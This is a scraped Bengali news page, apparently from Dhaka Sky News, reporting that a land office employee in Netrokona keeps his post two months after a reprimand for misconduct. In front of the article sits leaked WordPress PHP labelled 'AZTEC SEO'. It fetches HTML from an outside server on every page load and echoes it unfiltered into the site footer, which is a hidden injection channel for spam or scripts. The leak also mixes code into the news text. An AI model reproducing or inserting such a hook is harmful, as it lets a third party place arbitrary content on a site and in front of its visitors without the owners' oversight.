/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ‘লঘুদণ্ডের’ দুইমাস পরও স্বপদে বহাল ভূমি কর্মচারী | Dhaka Sky News

‘ইউনূস আমলের হাম প্রতিরোধের প্রস্তুতি খতিয়ে দেখলেই প্রাদুর্ভাবের কারণ জানা যাবে’

আগের সংবাদ

ইরানের বৃহত্তম পেট্রোকেমিক্যাল কেন্দ্রে ইসরাইলের ভয়াবহ হামলা

পরের সংবাদ

‘লঘুদণ্ডের’ দুইমাস পরও স্বপদে বহাল ভূমি কর্মচারী

নেত্রকোনার মদন উপজেলার ভূমি অফিসের এক কর্মচারীর বিরুদ্ধে ‘অসদাচরণের’ অভিযোগ উঠেছে। অভিযোগ প্রমাণিত হওয়ায় গত ২ ফেব্রুয়ারি ভূমি অফিসের ক্রেডিট চেকিং কাম-সায়রাত সহকারী সাজ্জাদ হোসেন ভূঁইয়াকে বিভাগীয় লঘুদণ্ড প্রদান করা হয়।

ময়মনসিংহ বিভাগীয় কমিশনারের কার্যালয় থেকে এক অফিস আদেশে তিরস্কারমূলক লঘুদণ্ড দেওয়ার দুই মাস পার হলেও এখনো স্বপদে বহাল রয়েছেন তিনি।

এ ব্যাপারে স্থানীয়রা অভিযোগ জানিয়ে বলেন, অপরাধ স্বীকার করেও শুধু ‘তিরস্কার’ দিয়ে কি সত্যিই দায়মুক্তি সম্ভব?

সংশ্লিষ্ট সূত্রে জানা গেছে, নেত্রকোনা সদরে কর্মরত থাকাকালীন অসম্পূর্ণ আমানতনামা সরবরাহের অভিযোগে তার বিরুদ্ধে সরকারি কর্মচারী (শৃঙ্খলা ও আপিল) বিধিমালা-২০১৮ অনুযায়ী মামলা হয়। ব্যক্তিগত শুনানিতে সাজ্জাদ হোসেন নিজের অপরাধ স্বীকার করলে তাকে দোষী সাব্যস্ত করা হয়।

এ বিষয়ে সোমবার (৬ এপ্রিল) বক্তব্য জানতে চাইলে সাজ্জাদ হোসেন সাংবাদিকদের কোনো উত্তর না দিয়ে উলটো ভিডিও করতে থাকেন।

মদন উপজেলার সহকারী কমিশনার (ভূমি) শাওলীন নাহার বলেন, লঘুদণ্ড প্রদানের মাধ্যমে তার বিভাগীয় মামলাটি নিষ্পত্তি হয়েছে।

সাংবাদিকদের সঙ্গে ওই কর্মচারীর অপেশাদার আচরণের জন্য তিনি দুঃখ প্রকাশ করেন এবং তাকে সতর্ক করার আশ্বাস দেন।